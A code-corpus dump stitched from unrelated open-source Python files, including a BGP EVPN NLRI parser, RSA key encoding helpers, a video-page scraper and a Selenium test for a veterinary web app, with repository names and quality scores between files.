help_text="\n Limit recent articles based on tags. This is the \n first priority in what articles are returned and will be overriden\n if you also select a category.\n ",
to="news.ArticleTag",
),
),
]
| 1.992188 | 2 |
working/website/make_news_posts.py | flatironinstitute/spikeforest_old | 1 | 12795673 | <reponame>flatironinstitute/spikeforest_old<gh_stars>1-10
#!/usr/bin/env python
import os
import shutil
import json
import frontmatter
def main():
if os.path.exists('news_posts'):
shutil.rmtree('news_posts')
os.mkdir('news_posts')
newspath = '../../docs/news'
news_posts = []
for fname in os.listdir(newspath):
if fname.endswith('.md'):
fm = frontmatter.load(newspath + '/' + fname).to_dict()
news_posts.append(dict(
title=fm['title'],
date=fm['date'].isoformat(),
author=fm['author'],
markdown=fm['content']
))
out_fname = 'news_posts/NewsPosts.json'
print('Writing to {}'.format(out_fname))
with open(out_fname, 'w') as f:
json.dump(news_posts, f)
print('Done.')
if __name__ == "__main__":
main()
| 2.40625 | 2 |
app/spider_store/extractors/ku6.py | lihaoABC/trans_api | 0 | 12795674 | <reponame>lihaoABC/trans_api
# _*_ codingLUTF-8 _*_
import logging
import random
import re
import urllib.parse
from app.spider_store.common import (
match1,
get_content,
)
from app.spider_store.configs import FAKE_USER_AGENT
headers = {
'user-agent': random.choice(FAKE_USER_AGENT)
}
def baomihua_download_by_id(_id, title, source, img_url, type):
html = get_content(
'http://play.baomihua.com/getvideourl.aspx?flvid={}&devicetype='
'phone_app'.format(_id)
)
host = match1(html, r'host=([^&]*)')
_type = match1(html, r'videofiletype=([^&]*)')
vid = match1(html, r'&stream_name=([^&]*)')
dir_str = match1(html, r'&dir=([^&]*)').strip()
video_url = 'http://{}/{}/{}.{}'.format(host, dir_str, vid, _type)
logging.debug("url is {}".format(video_url))
if title is None:
title = match1(html, r'&title=([^&]*)')
title = urllib.parse.unquote(title)
if source is None:
return None
if img_url is None:
img_url = match1(html, r'&video_img=([^&]*)')
ext = _type
size = int(match1(html, r'&videofilesize=([^&]*)'))
size = float("{:.2f}".format(int(size) / 1024 / 1024))
data = {
"type": type,
"title": title,
"source": source,
"thumbnail_urls": [img_url],
"image_urls": None,
"video_url": [video_url],
"ext": ext,
"size": size,
}
return data
def ku6_download(url):
html = get_content(url)
type = news_type(url)
title = match1(html, r"\$\(['\"]#video-title['\"]\)\.text\(['\"]([\s\S\w\W]+?)['\"]\);")
if title is None:
title = match1(html, r"document\.title\s*=\s*['\"]([\s\S\w\W]+?)['\"];")
title = title.strip()
source = match1(html, r"\$\(['\"]#video-author['\"]\)\.text\(['\"](.*?)['\"]\);")
img_url = match1(html, r'[\'|"]poster[\'|"]:\s*[\'|"](.*?)[\'|"],\s*[\'|"]controls[\'|"]:')
video_url = match1(html, r'this\.src\(\{type:\s*[\'|"]video/mp4[\'|"], src: [\'|"](.*?)[\'|"]}\);')
data = {
"type": type,
"title": title,
"source": source,
"thumbnail_urls": [img_url],
"image_urls": None,
"video_url": [video_url],
"ext": None,
"size": None,
}
return data
def news_type(url):
# https://www.ku6.com/video/detail?id=4Oqd5_XQsCDtJU7HMjHRD4nrgAg.
if re.search(r"http[s]?://www\.ku6\.com/video/detail\?id=.*?$", url):
return "video"
download = ku6_download
if __name__ == '__main__':
url = "https://www.ku6.com/video/detail?id=gRJ4Q0LnmBx7IzxAI019mjiDMMA."
data = download(url)
print(data) | 2.15625 | 2 |
main.py | omarzanji/nlp-search | 0 | 12795675 | """
Given a substring, search an array of strings by cosine simularity (linear kernel) by
returning the index with highest kernel output (confidence).
"""
class NLPSearch:
def __init__(self):
pass
def process_data(self):
pass
def create_model(self):
pass
def train_model(self):
pass
def prompt(self, prompt):
pass
if __name__ == "__main__":
search = NLPSearch() | 3.171875 | 3 |
google API/NL.py | nfrumkin/ElMingle | 1 | 12795676 | # Imports the Google Cloud client library
from google.cloud import language
from google.cloud.language import enums
from google.cloud.language import types
# Instantiates a client
client = language.LanguageServiceClient()
ENTITY_TYPE_TO_IGNORE = [8, 9, 10, 11, 12]
# The text to analyze
text = "Aside from course work, my passion for traveling was what prompted me to take part in the study aboard program in Dresden, Germany, in the spring of 2018 and Tokyo, Japan in the summer of 2017. While taking classes offered at both TU Dresden and Tokyo tech, I spent most of my off time traveling Europe and around the city. Combine with my study in the States, I believe that it is these experiences that taught me how to quickly adapt to changes in the environment and apply my ability in a different context. My passion for electronics and computers is also what prompts me to join the High-Performance Computing (HPC) club and continue to be an active member of the university maker space. My decision to take part in the leadership role of the BUHPC contained more than my interest in the subject matter; I wish to inspire others learning about HPC by sharing a subject that I enjoy learning. Similarly, by taking part in the engineering "
def gapiAnalysisText(text):
document = types.Document(
content=text,
type=enums.Document.Type.PLAIN_TEXT)
encoding_type = enums.EncodingType.UTF8
response = client.analyze_entities(document, encoding_type=encoding_type)
# Loop through entitites returned from the API
key_words=list()
for entity in response.entities:
if (entity.type not in ENTITY_TYPE_TO_IGNORE):
key_words.append(entity.name)
key_words=list(dict.fromkeys(key_words))
key_words.sort()
return ",".join(map(str,key_words))
char_str= gapiAnalysisText(text)
print(char_str)
| 2.921875 | 3 |
causal_world/metrics/__init__.py | michaelfeil/CausalWorld | 2 | 12795677 | from causal_world.metrics.metric_base import BaseMetric
from causal_world.metrics.mean_accumulated_reward_metric import \
MeanAccumulatedRewardMetric
from causal_world.metrics.mean_full_integrated_fractional_success \
import MeanFullIntegratedFractionalSuccess
from causal_world.metrics.mean_last_fractional_success import \
MeanLastFractionalSuccess
from causal_world.metrics.mean_last_integrated_fractional_success import \
MeanLastIntegratedFractionalSuccess
| 1.125 | 1 |
src/utils/key_generator.py | oswagner/rsa-implementation | 0 | 12795678 | <reponame>oswagner/rsa-implementation
from base64 import b64decode
from pyasn1.codec.der.encoder import encode
from pyasn1.codec.der.decoder import decode
from utils.private_key import AsnSchemaPrivateKey
from utils.public_key import AsnSchemaPublicKey
#
# Utilizado como apoio para criação formatação das chaves
# https://github.com/sybrenstuvel/python-rsa
#
#
# bibloteca de apoio para estrutura das chaves
# https://github.com/etingof/pyasn1
#
# #
def generate_public_key(e, modulus):
asn_key = AsnSchemaPublicKey()
asn_key.setComponentByName('modulus', modulus)
asn_key.setComponentByName('publicExponent', e)
return encode(asn_key)
def generate_private_key(e, n, d, p, q, exp1, exp2, coef):
# Create the ASN object
asn_key = AsnSchemaPrivateKey()
asn_key.setComponentByName('version', 0)
asn_key.setComponentByName('modulus', n)
asn_key.setComponentByName('publicExponent', e)
asn_key.setComponentByName('privateExponent', d)
asn_key.setComponentByName('prime1', p)
asn_key.setComponentByName('prime2', q)
asn_key.setComponentByName('exponent1', exp1)
asn_key.setComponentByName('exponent2', exp2)
asn_key.setComponentByName('coefficient', coef)
return encode(asn_key)
def decode_public_key(public_key_encoded):
# Undo BASE64 serialisation
der_serialisation = b64decode(public_key_encoded)
# Undo DER serialisation, reconstruct SSH key structure
public_key, rest_of_input = decode(
der_serialisation, asn1Spec=AsnSchemaPublicKey())
return public_key
def decode_private_key(private_key_encoded):
# Undo BASE64 serialisation
der_serialisation = b64decode(private_key_encoded)
# Undo DER serialisation, reconstruct SSH key structure
private_key, rest_of_input = decode(
der_serialisation, asn1Spec=AsnSchemaPrivateKey())
return private_key
| 2.609375 | 3 |
tests/test_models.py | lydiah2015/news-highlight | 0 | 12795679 | <filename>tests/test_models.py
from app.models import Article,Source
from unittest import TestCase
class TestSource(TestCase):
def setUp(self):
self.source=Source("BuzzFeed","BuzzFeed is a cross-platform")
def test_instance(self):
self.assertIsInstance(self.source,Source)
def test_create(self):
self.assertEqual(self.source.name,"BuzzFeed")
self.assertEqual(self.source.description,
"BuzzFeed is a cross-platform"
)
class TestArticle(TestCase):
def setUp(self):
self.article=Article(
"title","urlToImage","description","url","author"
)
def test_instance(self):
self.assertIsInstance(self.article,Article)
def test_create(self):
self.assertEqual(self.article.title,"title")
self.assertEqual(self.article.description,
"description"
)
if __name__ == '__main__':
unittest.main() | 3.09375 | 3 |
ch_python/def_tempconv.py | yehnan/rpi_book_yehnan | 3 | 12795680 | #!/usr/bin/env python
def ftoc(f):
return (f - 32) * 5 / 9
def ctof(c):
return c * (9 / 5) + 32
print("Celsius degree 55 is equal to Fahrenheit degree " + str(ctof(55)));
print("Fahrenheit degree 55 is equal to Celsius degree " + str(ftoc(55)));
| 3.890625 | 4 |
tests/conftest.py | idlesign/opencv-proto | 18 | 12795681 | <gh_stars>10-100
import pytest
from pathlib import Path
STUB = False
if STUB:
from pytest_stub.toolbox import stub_global
stub_global({
'cv2': '[mock_persist]',
'numpy': '[mock_persist]',
})
@pytest.fixture
def static_path(request):
path = request.fspath
def static_path_(fname):
return Path(str(path)).parent / 'static' / fname
return static_path_
| 2.015625 | 2 |
yabgp/message/attribute/nlri/evpn.py | OpenBGP/openbgp | 0 | 12795682 | <filename>yabgp/message/attribute/nlri/evpn.py
# Copyright 2016 Cisco Systems, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import division
import struct
import binascii
import netaddr
from yabgp.common import afn
from yabgp.common import safn
from yabgp.common import constants as bgp_cons
from yabgp.message.attribute.nlri import NLRI
from yabgp.message.attribute.nlri.mpls_vpn import MPLSVPN
class EVPN(NLRI):
"""
The format of the EVPN NLRI is as follows:
+-----------------------------------+
| Route Type (1 octet) |
+-----------------------------------+
| Length (1 octet) |
+-----------------------------------+
| Route Type specific (variable) |
+-----------------------------------+
"""
@classmethod
def parse(cls, nlri_data):
nlri_list = []
while nlri_data:
route_type = ord(nlri_data[0:1])
offset = ord(nlri_data[1:2])
route_value = nlri_data[2: offset + 2]
route = {}
if route_type == bgp_cons.BGPNLRI_EVPN_ETHERNET_AUTO_DISCOVERY:
route = EthernetAutoDiscovery.parse(route_value)
elif route_type == bgp_cons.BGPNLRI_EVPN_MAC_IP_ADVERTISEMENT:
route = MacIPAdvertisment.parse(route_value)
elif route_type == bgp_cons.BGPNLRI_EVPN_INCLUSIVE_MULTICAST_ETHERNET_TAG:
route = InclusiveMulticastEthernetTag.parse(route_value)
elif route_type == bgp_cons.BGPNLRI_EVPN_ETHERNET_SEGMENT:
route = EthernetSegment.parse(route_value)
elif route_type == bgp_cons.BGPNLRI_EVPN_IP_ROUTE_PREFIX:
route = IPRoutePrefix.parse(route_value)
if route:
nlri_list.append({
'type': route_type,
'value': route
})
nlri_data = nlri_data[offset + 2:]
return nlri_list
@classmethod
def construct(cls, nlri_list):
nlri_list_hex = b''
for nlri in nlri_list:
nlri_hex = b''
if nlri['type'] == bgp_cons.BGPNLRI_EVPN_ETHERNET_AUTO_DISCOVERY:
nlri_hex = EthernetAutoDiscovery.construct(value=nlri['value'])
elif nlri['type'] == bgp_cons.BGPNLRI_EVPN_MAC_IP_ADVERTISEMENT:
nlri_hex = MacIPAdvertisment.construct(value=nlri['value'])
elif nlri['type'] == bgp_cons.BGPNLRI_EVPN_INCLUSIVE_MULTICAST_ETHERNET_TAG:
nlri_hex = InclusiveMulticastEthernetTag.construct(value=nlri['value'])
elif nlri['type'] == bgp_cons.BGPNLRI_EVPN_ETHERNET_SEGMENT:
nlri_hex = EthernetSegment.construct(value=nlri['value'])
elif nlri['type'] == bgp_cons.BGPNLRI_EVPN_IP_ROUTE_PREFIX:
nlri_hex = IPRoutePrefix.construct(value=nlri['value'])
if nlri_hex:
nlri_list_hex += struct.pack('!2B', nlri['type'], len(nlri_hex)) + nlri_hex
return nlri_list_hex
@staticmethod
def signal_evpn_overlay(attr_dict):
"""
draft-ietf-bess-evpn-overlay-10 changes label encoding if EVPN and encapsulation EC set
:param attr_dict: bgp attribute dictionary
"""
evpn_overlay = {'evpn': False, 'encap_ec': False}
try:
afi_safi = tuple(attr_dict.get(bgp_cons.BGPTYPE_MP_REACH_NLRI).get('afi_safi'))
community_ext = attr_dict.get(bgp_cons.BGPTYPE_EXTENDED_COMMUNITY)
except:
return evpn_overlay
if afi_safi == (afn.AFNUM_L2VPN, safn.SAFNUM_EVPN):
evpn_overlay['evpn'] = True
if community_ext:
for ec in community_ext:
if bgp_cons.BGP_EXT_COM_DICT['encapsulation'] == ec[0]:
evpn_overlay['encap_ec'] = True
evpn_overlay['encap_value'] = int(ec[1])
return evpn_overlay
@classmethod
def parse_rd(cls, data):
"""
For Cisco: The BGP route distinguisher can be derived automatically
from the VNI and BGP router ID of the VTEP switch
:param data:
:return:
"""
rd_type = struct.unpack('!H', data[0:2])[0]
rd_value = data[2:8]
if rd_type == bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_0:
asn, an = struct.unpack('!HI', rd_value)
rd = '%s:%s' % (asn, an)
elif rd_type == bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_1:
ip = str(netaddr.IPAddress(struct.unpack('!I', rd_value[0:4])[0]))
an = struct.unpack('!H', rd_value[4:6])[0]
rd = '%s:%s' % (ip, an)
elif rd_type == bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_2:
asn, an = struct.unpack('!IH', rd_value)
rd = '%s:%s' % (asn, an)
else:
# fixme(by xiaopeng163) for other rd type process
rd = str(rd_value)
return rd
@classmethod
def construct_rd(cls, data):
# fixme(by xiaopeng163) for other rd type process
data = data.split(':')
if '.' in data[0]:
return struct.pack('!H', bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_1) + netaddr.IPAddress(data[0]).packed + \
struct.pack('!H', int(data[1]))
else:
data = [int(x) for x in data]
if data[0] <= 0xffff:
return struct.pack('!HHI', bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_0, data[0], data[1])
else:
return struct.pack('!HIH', bgp_cons.BGP_ROUTE_DISTINGUISHER_TYPE_2, data[0], data[1])
@classmethod
def parse_esi(cls, esi):
"""
The ESI has the following format:
+---+---+---+---+---+---+---+---+---+---+
| T | ESI Value |
+---+---+---+---+---+---+---+---+---+---+
"""
esi_type, esi_value = struct.unpack("!B", esi[:1])[0], {}
if esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_0:
esi_value = int.from_bytes(esi[1:], byteorder='big')
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_1:
esi_value = {
"ce_mac_addr": str(netaddr.EUI(int(binascii.b2a_hex(esi[1:7]), 16))),
"ce_port_key": int.from_bytes(esi[7:9], byteorder='big')
}
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_2:
esi_value = {
"rb_mac_addr": str(netaddr.EUI(int(binascii.b2a_hex(esi[1:7]), 16))),
"rb_priority": int.from_bytes(esi[7:9], byteorder='big')
}
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_3:
esi_value = {
"sys_mac_addr": str(netaddr.EUI(int(binascii.b2a_hex(esi[1:7]), 16))),
"ld_value": int.from_bytes(esi[7:], byteorder='big')
}
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_4:
esi_value = {
"router_id": int.from_bytes(esi[1:5], byteorder='big'),
"ld_value": int.from_bytes(esi[5:9], byteorder='big')
}
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_5:
esi_value = {
"as_num": int.from_bytes(esi[1:5], byteorder='big'),
"ld_value": int.from_bytes(esi[5:9], byteorder='big')
}
return {"type": esi_type, "value": esi_value}
@classmethod
def construct_esi(cls, esi_data):
esi_type, esi_value = esi_data["type"], esi_data["value"]
esi_data_hex = b''
if esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_0:
esi_bytes = esi_value.to_bytes(9, byteorder='big')
esi_data_hex = b'\x00' + esi_bytes
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_1:
ce_mac_addr, ce_port_key = esi_value["ce_mac_addr"], esi_value["ce_port_key"]
ce_mac_hex = b''.join([struct.pack('!B', (int(i, 16))) for i in ce_mac_addr.split("-")])
ce_port_hex = ce_port_key.to_bytes(2, byteorder='big')
esi_data_hex = b'\x01' + ce_mac_hex + ce_port_hex + b'\x00'
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_2:
rb_mac_addr, rb_priority = esi_value["rb_mac_addr"], esi_value["rb_priority"]
rb_mac_hex = b''.join([struct.pack('!B', (int(i, 16))) for i in rb_mac_addr.split("-")])
rb_priority_hex = rb_priority.to_bytes(2, byteorder='big')
esi_data_hex = b'\x02' + rb_mac_hex + rb_priority_hex + b'\x00'
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_3:
sys_mac_addr, ld_value = esi_value["sys_mac_addr"], esi_value["ld_value"]
sys_mac_hex = b''.join([struct.pack('!B', (int(i, 16))) for i in sys_mac_addr.split("-")])
ld_value_hex = ld_value.to_bytes(3, byteorder='big')
esi_data_hex = b'\x03' + sys_mac_hex + ld_value_hex
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_4:
router_id, ld_value = esi_value["router_id"], esi_value["ld_value"]
router_id_hex = router_id.to_bytes(4, byteorder='big')
ld_value_hex = ld_value.to_bytes(4, byteorder='big')
esi_data_hex = b'\x04' + router_id_hex + ld_value_hex + b'\x00'
elif esi_type == bgp_cons.ESI_BGPNLRI_EVPN_TYPE_5:
as_num, ld_value = esi_value["as_num"], esi_value["ld_value"]
as_num_hex = as_num.to_bytes(4, byteorder='big')
ld_value_hex = ld_value.to_bytes(4, byteorder='big')
esi_data_hex = b'\x05' + as_num_hex + ld_value_hex + b'\x00'
return esi_data_hex
class EthernetAutoDiscovery(EVPN):
"""
+---------------------------------------+
| Route Distinguisher (RD) (8 octets) |
+---------------------------------------+
|Ethernet Segment Identifier (10 octets)|
+---------------------------------------+
| Ethernet Tag ID (4 octets) |
+---------------------------------------+
| MPLS Label (3 octets) |
+---------------------------------------+
"""
@classmethod
def parse(cls, value, iswithdraw=False):
route = dict()
route['rd'] = cls.parse_rd(value[0:8])
offset = 8
route['esi'] = cls.parse_esi(value[offset: offset + 10])
offset += 10
# ethernet tag id
route['eth_tag_id'] = struct.unpack('!I', value[offset: offset + 4])[0]
offset += 4
route['label'] = cls.parse_mpls_label_stack(value[offset:])
return route
@classmethod
def construct(cls, value, iswithdraw=False):
# rd
value_hex = b''
value_hex += cls.construct_rd(value['rd'])
# esi
value_hex += b'\x00\x00' + struct.pack('!d', value['esi'])
# ethernet tag
value_hex += struct.pack('!I', value['eth_tag_id'])
value_hex += cls.construct_mpls_label_stack(value['label'])
return value_hex
class MacIPAdvertisment(EVPN):
"""
+---------------------------------------+
| RD (8 octets) |
+---------------------------------------+
|Ethernet Segment Identifier (10 octets)|
+---------------------------------------+
| Ethernet Tag ID (4 octets) |
+---------------------------------------+
| MAC Address Length (1 octet) |
+---------------------------------------+
| MAC Address (6 octets) |
+---------------------------------------+
| IP Address Length (1 octet) |
+---------------------------------------+
| IP Address (0, 4, or 16 octets) |
+---------------------------------------+
| MPLS Label1 (3 octets) |
+---------------------------------------+
| MPLS Label2 (0 or 3 octets) |
+---------------------------------------+
"""
@classmethod
def parse(cls, value, iswithdraw=False):
route = dict()
# rd
offset = 8
route['rd'] = cls.parse_rd(value[0:offset])
# esi
route['esi'] = cls.parse_esi(value[offset: offset + 10])
offset += 10
# ethernet tag id
route['eth_tag_id'] = struct.unpack('!I', value[offset: offset + 4])[0]
offset += 5
# mac address
route['mac'] = str(netaddr.EUI(int(binascii.b2a_hex(value[offset: offset + 6]), 16)))
offset += 6
ip_addr_len = ord(value[offset: offset + 1])
offset += 1
# ip address
if ip_addr_len != 0:
route['ip'] = str(netaddr.IPAddress(
int(binascii.b2a_hex(value[offset: offset + int(ip_addr_len / 8)]), 16)))
offset += int(ip_addr_len / 8)
# label
route['label'] = cls.parse_mpls_label_stack(value[offset:])
return route
@classmethod
def construct(cls, value, iswithdraw=False):
# rd
value_hex = b''
value_hex += cls.construct_rd(value['rd'])
# esi
value_hex += b'\x00\x00' + struct.pack('!d', value['esi'])
# ethernet tag
value_hex += struct.pack('!I', value['eth_tag_id'])
# mac address len and address
mac_hex = b''.join([struct.pack('!B', (int(i, 16))) for i in value['mac'].split("-")])
value_hex += struct.pack('!B', len(mac_hex) * 8) + mac_hex
# ip address len and address
if value.get('ip'):
ip_hex = netaddr.IPAddress(value['ip']).packed
value_hex += struct.pack('!B', len(ip_hex) * 8) + ip_hex
else:
value_hex += b'\x00'
if value.get('label'):
value_hex += cls.construct_mpls_label_stack(value['label'])
return value_hex
class InclusiveMulticastEthernetTag(EVPN):
"""
+---------------------------------------+
| RD (8 octets) |
+---------------------------------------+
| Ethernet Tag ID (4 octets) |
+---------------------------------------+
| IP Address Length (1 octet) |
+---------------------------------------+
| Originating Router's IP Address |
| (4 or 16 octets) |
+---------------------------------------+
"""
@classmethod
def parse(cls, value, iswithdraw=False):
route = dict()
offset = 8
route['rd'] = cls.parse_rd(value[0:offset])
route['eth_tag_id'] = struct.unpack('!I', value[offset: offset + 4])[0]
offset += 4
ip_addr_len = ord(value[offset: offset + 1])
offset += 1
# ip address
if ip_addr_len != 0:
route['ip'] = str(netaddr.IPAddress(int(binascii.b2a_hex(value[offset: int(offset + ip_addr_len / 8)]), 16)))
return route
@classmethod
def construct(cls, value, iswithdraw=False):
# rd
value_hex = b''
value_hex += cls.construct_rd(value['rd'])
value_hex += struct.pack('!I', value['eth_tag_id'])
# ip address len and address
if value.get('ip'):
ip_hex = netaddr.IPAddress(value['ip']).packed
value_hex += struct.pack('!B', len(ip_hex) * 8) + ip_hex
else:
value_hex += b'\x00'
return value_hex
class EthernetSegment(EVPN):
"""
+---------------------------------------+
| RD (8 octets) |
+---------------------------------------+
|Ethernet Segment Identifier (10 octets)|
+---------------------------------------+
| IP Address Length (1 octet) |
+---------------------------------------+
| Originating Router's IP Address |
| (4 or 16 octets) |
+---------------------------------------+
"""
@classmethod
def parse(cls, value, iswithdraw=False):
route = dict()
offset = 8
route['rd'] = cls.parse_rd(value[0:offset])
# esi
route['esi'] = cls.parse_esi(value[offset: offset + 10])
offset += 10
ip_addr_len = ord(value[offset: offset + 1])
offset += 1
# ip address
if ip_addr_len != 0:
route['ip'] = str(netaddr.IPAddress(int(binascii.b2a_hex(value[offset: offset + ip_addr_len // 8]), 16)))
return route
@classmethod
def construct(cls, value, iswithdraw=False):
# rd
value_hex = b''
value_hex += cls.construct_rd(value['rd'])
# esi
value_hex += b'\x00\x00' + struct.pack('!d', value['esi'])
# ip address len and address
if value.get('ip'):
ip_hex = netaddr.IPAddress(value['ip']).packed
value_hex += struct.pack('!B', len(ip_hex) * 8) + ip_hex
else:
value_hex += b'\x00'
return value_hex
class IPRoutePrefix(EVPN):
"""
# http://tools.ietf.org/html/draft-ietf-bess-evpn-prefix-advertisement-01
+---------------------------------------+
| RD (8 octets) |
+---------------------------------------+
|Ethernet Segment Identifier (10 octets)|
+---------------------------------------+
| Ethernet Tag ID (4 octets) |
+---------------------------------------+
| IP Prefix Length (1 octet) |
+---------------------------------------+
| IP Prefix (4 or 16 octets) |
+---------------------------------------+
| GW IP Address (4 or 16 octets) |
+---------------------------------------+
| MPLS Label (3 octets) |
+---------------------------------------+
"""
@classmethod
def parse(cls, value, iswithdraw=False):
route = dict()
offset = 8
route['rd'] = cls.parse_rd(value[0:offset])
# esi
route['esi'] = cls.parse_esi(value[offset: offset + 10])
offset += 10
route['eth_tag_id'] = struct.unpack('!I', value[offset: offset + 4])[0]
offset += 4
ip_addr_len = ord(value[offset: offset + 1])
offset += 1
value = value[offset:]
# The IP Prefix Length can be set to a value between 0 and 32
# (bits) for ipv4 and between 0 and 128 for ipv6.
# The IP Prefix will be a 32 or 128-bit field (ipv4 or ipv6).
# # ip address
if len(value) == 11:
# ipv4
offset = 4
elif len(value) == 35:
# ipv6
offset = 16
route['prefix'] = '%s/%s' % (str(netaddr.IPAddress(int(binascii.b2a_hex(value[0: offset]), 16))), ip_addr_len)
value = value[offset:]
route['gateway'] = str(netaddr.IPAddress(int(binascii.b2a_hex(value[0: offset]), 16)))
value = value[offset:]
route['label'] = cls.parse_mpls_label_stack(value)
return route
@classmethod
def construct(cls, value, iswithdraw=False):
value_hex = b''
value_hex += cls.construct_rd(value['rd'])
value_hex += b'\x00\x00' + struct.pack('!d', value['esi'])
value_hex += struct.pack('!I', value['eth_tag_id'])
value_hex += struct.pack('!B', int(value['prefix'].split('/')[1]))
value_hex += netaddr.IPAddress(value['prefix'].split('/')[0]).packed
value_hex += netaddr.IPAddress(value['gateway']).packed
value_hex += cls.construct_mpls_label_stack(value['label'])
return value_hex
| 2.078125 | 2 |
Week6JamesNoonanAdv.py | WarpedDemon/Webtesting | 0 | 12795683 | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions
from selenium.common.exceptions import NoSuchElementException
import time, math
class PageGetSet:
def __init__(self):
self.PET_OWNERS = 0
self.INVENTORY = 1
self.VETS = 2
self.VETS_DETAILS = 3
self.APPOINTMENTS = 4
self.PET_OWNER_DETAILS = 5
self.APPOINTMENT_DETAILS = 6
self.Browser = None
self.WorkElement = None
self.Pages = [
"PetOwners.aspx",
"Inventory.aspx",
"Vets.aspx",
"VetDetails.aspx",
"Appointments.aspx",
"PetOwnerDetails.aspx",
"AppointmentDetails.aspx"
]
self.Statistics = {
"success": 0,
"fail": 0,
"max": 0
}
self.CurrentPage = self.PET_OWNERS
self.InitializeBrowser("http://localhost:50452/" + self.Pages[self.CurrentPage])
self.RunCommands()
def InitializeBrowser(self, address):
self.Browser = webdriver.Firefox()
self.Browser.get(address)
def UpdateStatistics(self, status):
self.Statistics[status] += 1
self.Statistics["max"] += 1
def GetElementById(self, id):
try:
self.WorkElement = self.Browser.find_element_by_id(id)
return self.WorkElement
except NoSuchElementException:
return False
def SendKeysToElement(self, element, keys):
element.clear()
element.send_keys(keys)
def WaitForElementToExist(self, id):
WebDriverWait(self.Browser, 3).until(
expected_conditions.visibility_of_element_located(
(By.ID, id)
)
)
def SwitchToPage(self, pageID):
self.CurrentPage = pageID
self.Browser.get("http://localhost:50452/" + self.Pages[self.CurrentPage])
def ClickElement(self, element):
element.click()
def ClickElementById(self, elementId):
self.GetElementById(elementId).click()
def Sleep(self, length):
time.sleep(length)
def IfExistById(self, id):
try:
value = self.GetElementById(id)
if(value == False): return False
return True
except NoSuchElementException:
print("NO PAGE")
return False
def PetOwners(self):
print("Testing Pet Owners Start")
self.SwitchToPage(self.PET_OWNERS)
self.SendKeysToElement(self.GetElementById("txtSearch"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearch']").click()
print("Testing Pet Owners Finish")
self.Sleep(3)
def PetOwnersDetails(self):
print("Testing Pet Owners Details Start")
self.SwitchToPage(self.PET_OWNER_DETAILS)
self.SendKeysToElement(self.GetElementById("txtFirstname"), "Arnold")
self.SendKeysToElement(self.GetElementById("txtLastname"), "Schwarzenegger")
self.SendKeysToElement(self.GetElementById("txtMobile"), "424-288-2000")
self.SendKeysToElement(self.GetElementById("txtEmail"), "<EMAIL>")
self.Browser.find_element_by_xpath("//input[@id='chkID']").click()
self.Browser.find_element_by_xpath("//input[@id='btnSave']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
self.SendKeysToElement(self.GetElementById("txtPetName"), "Arnold")
self.SendKeysToElement(self.GetElementById("txtPetDOB"), "02/01/2023")
self.SendKeysToElement(self.GetElementById("txtPetType"), "Schwarzenegger")
self.SendKeysToElement(self.GetElementById("txtPetBreed"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnAddPet']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
print("Testing Pet Owners Details Finish")
self.Sleep(3)
def Inventory(self):
print("Testing Inventory Start")
self.SwitchToPage(self.INVENTORY)
self.SendKeysToElement(self.GetElementById("txtName"), "Arnold")
self.SendKeysToElement(self.GetElementById("txtQuantity"), "50")
self.SendKeysToElement(self.GetElementById("txtCost"), "2.0")
self.SendKeysToElement(self.GetElementById("txtPrice"), "2.0")
self.Browser.find_element_by_xpath("//input[@id='btnSave']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
self.SendKeysToElement(self.GetElementById("txtSearch"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearch']").click()
print("Testing Inventory Finish")
self.Sleep(3)
def Vets(self):
print("Testing Vets Start")
self.SwitchToPage(self.VETS)
self.SendKeysToElement(self.GetElementById("txtSearch"), "Arnold")
self.Browser.find_element_by_xpath("//input[@id='btnSearch']").click()
print("Testing Vets Finish")
self.Sleep(3)
def VetsDetails(self):
print("Testing Vets Details Start")
self.SwitchToPage(self.VETS_DETAILS)
self.SendKeysToElement(self.GetElementById("txtFirstName"), "Arnold")
self.SendKeysToElement(self.GetElementById("txtLastName"), "Schwarzenegger")
self.SendKeysToElement(self.GetElementById("txtMobileNo"), "56675675")
self.SendKeysToElement(self.GetElementById("txtEmail"), "<EMAIL>")
self.SendKeysToElement(self.GetElementById("txtAddress"), "50 apple cross ave")
self.SendKeysToElement(self.GetElementById("txtPostcode"), "6023")
self.SendKeysToElement(self.GetElementById("txtSkills"), "BodyBuilder")
self.Browser.find_element_by_xpath("//input[@id='btnSave']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
self.Browser.find_element_by_xpath("//option[@value='Feb']").click()
self.SendKeysToElement(self.GetElementById("txtSkills"), "BodyBuilder")
self.Browser.find_element_by_xpath("//input[@id='chkTue']").click()
self.Browser.find_element_by_xpath("//input[@id='btnAddAvailability']").click()
alert = self.Browser.switch_to_alert()
alert.accept()
print("Testing Vets Details Finish")
self.Sleep(3)
def Appointments(self):
